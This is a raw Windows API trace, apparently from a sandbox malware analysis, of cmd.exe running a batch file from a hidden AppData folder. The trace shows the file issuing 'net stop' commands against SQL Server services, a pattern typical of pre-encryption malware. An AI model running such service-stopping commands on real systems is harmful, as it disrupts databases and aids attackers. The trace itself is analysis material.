_vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0207.256] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0207.256] GetProcessHeap () returned 0x3e0000 [0207.256] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.256] GetEnvironmentStringsW () returned 0x3f8408* [0207.256] GetProcessHeap () returned 0x3e0000 [0207.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.257] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.257] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.257] GetProcessHeap () returned 0x3e0000 [0207.257] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.257] GetEnvironmentStringsW () returned 0x3f8408* [0207.257] GetProcessHeap () returned 0x3e0000 [0207.257] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.257] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.257] GetProcessHeap () returned 0x3e0000 [0207.257] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0207.257] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0207.257] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.257] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0207.258] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.258] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0207.258] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.258] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0207.258] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.258] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0207.258] SetConsoleInputExeNameW () returned 0x1 [0207.258] GetConsoleOutputCP () returned 0x1b5 [0207.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0207.258] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0207.259] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0207.259] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.259] SetFilePointer (in: hFile=0x74, lDistanceToMove=4247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1097 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0207.259] GetProcessHeap () returned 0x3e0000 [0207.259] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0207.260] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1097 [0207.260] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x82a, lpOverlapped=0x0) returned 1 [0207.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10b2 [0207.260] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$CXDB /y\r\nServiceΓÇ¥ /y\r\n\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 27 [0207.260] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.260] GetFileType (hFile=0x74) returned 0x1 [0207.260] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10b2 [0207.260] GetProcessHeap () returned 0x3e0000 [0207.260] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0207.260] GetProcessHeap () returned 0x3e0000 [0207.260] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0207.264] _tell (_FileHandle=3) returned 4274 [0207.264] _close (_FileHandle=3) returned 0 [0207.264] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0207.264] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0207.264] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0207.264] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0207.264] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0207.264] _wcsicmp (_String1="net", _String2="CD") returned 11 [0207.264] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0207.264] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0207.264] _wcsicmp (_String1="net", _String2="REN") returned -4 [0207.264] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0207.264] _wcsicmp (_String1="net", _String2="SET") returned -5 [0207.264] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0207.264] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0207.264] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0207.268] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0207.268] _wcsicmp (_String1="net", _String2="MD") returned 1 [0207.268] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0207.268] _wcsicmp (_String1="net", _String2="RD") returned -4 [0207.268] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0207.268] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0207.268] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0207.268] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0207.268] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0207.268] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0207.268] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0207.268] _wcsicmp (_String1="net", _String2="VER") returned -8 [0207.268] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0207.268] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0207.268] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0207.269] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0207.269] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0207.269] _wcsicmp (_String1="net", _String2="START") returned -5 [0207.269] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0207.269] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0207.269] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0207.269] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0207.270] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0207.270] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0207.270] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0207.270] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0207.270] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0207.270] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0207.271] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0207.271] SetErrorMode (uMode=0x0) returned 0x1 [0207.271] GetProcessHeap () returned 0x3e0000 [0207.271] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0207.271] GetProcessHeap () returned 0x3e0000 [0207.271] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0207.271] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.271] GetProcessHeap () returned 0x3e0000 [0207.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0207.271] GetProcessHeap () returned 0x3e0000 [0207.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0207.272] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0207.272] GetProcessHeap () returned 0x3e0000 [0207.272] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0207.272] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.272] GetProcessHeap () returned 0x3e0000 [0207.272] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0207.272] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0207.272] GetProcessHeap () returned 0x3e0000 [0207.272] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0207.273] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.273] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.275] GetLastError () returned 0x2 [0207.276] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.276] GetLastError () returned 0x2 [0207.276] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.277] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.277] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.277] GetLastError () returned 0x2 [0207.278] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.278] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.278] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.279] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0207.279] SetErrorMode (uMode=0x0) returned 0x1 [0207.279] GetProcessHeap () returned 0x3e0000 [0207.279] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0207.279] GetProcessHeap () returned 0x3e0000 [0207.279] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0207.279] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.279] GetProcessHeap () returned 0x3e0000 [0207.279] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0207.279] GetProcessHeap () returned 0x3e0000 [0207.279] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0207.291] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0207.291] GetProcessHeap () returned 0x3e0000 [0207.291] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0207.291] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.291] GetProcessHeap () returned 0x3e0000 [0207.291] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0207.292] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0207.292] GetProcessHeap () returned 0x3e0000 [0207.292] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0207.292] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.292] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.292] GetLastError () returned 0x2 [0207.293] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.293] GetLastError () returned 0x2 [0207.293] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.294] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0207.294] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0207.294] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.294] GetLastError () returned 0x2 [0207.295] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0207.295] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0207.295] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.295] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0207.295] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0207.296] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0207.296] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.296] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$CXDB /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$CXDB /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$CXDB /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8d4, dwThreadId=0x8c8)) returned 1 [0207.313] CloseHandle (hObject=0x74) returned 1 [0207.313] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.313] GetProcessHeap () returned 0x3e0000 [0207.313] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.313] GetEnvironmentStringsW () returned 0x3f8408* [0207.313] GetProcessHeap () returned 0x3e0000 [0207.314] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.314] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.314] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0207.503] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0207.503] CloseHandle (hObject=0x78) returned 1 [0207.503] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0207.503] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0207.503] GetProcessHeap () returned 0x3e0000 [0207.503] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.503] GetEnvironmentStringsW () returned 0x3f8408* [0207.503] GetProcessHeap () returned 0x3e0000 [0207.503] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.504] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.504] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.504] GetProcessHeap () returned 0x3e0000 [0207.504] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.504] GetEnvironmentStringsW () returned 0x3f8408* [0207.504] GetProcessHeap () returned 0x3e0000 [0207.504] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.504] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.504] GetProcessHeap () returned 0x3e0000 [0207.504] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0207.504] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0207.504] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.504] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0207.505] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.505] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0207.505] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.505] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0207.505] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.505] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0207.505] SetConsoleInputExeNameW () returned 0x1 [0207.505] GetConsoleOutputCP () returned 0x1b5 [0207.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0207.506] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.506] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0207.506] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0207.506] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.506] SetFilePointer (in: hFile=0x78, lDistanceToMove=4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10b2 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0207.506] GetProcessHeap () returned 0x3e0000 [0207.506] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0207.507] GetProcessHeap () returned 0x3e0000 [0207.507] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0207.507] GetProcessHeap () returned 0x3e0000 [0207.507] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0207.507] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.507] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10b2 [0207.507] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x80f, lpOverlapped=0x0) returned 1 [0207.508] SetFilePointer (in: hFile=0x78, lDistanceToMove=4298, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10ca [0207.508] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLBrowser /y\r\ny\r\nServiceΓÇ¥ /y\r\n\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 24 [0207.508] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.508] GetFileType (hFile=0x78) returned 0x1 [0207.508] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.508] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10ca [0207.508] GetProcessHeap () returned 0x3e0000 [0207.508] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0207.508] GetProcessHeap () returned 0x3e0000 [0207.508] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0207.511] _tell (_FileHandle=3) returned 4298 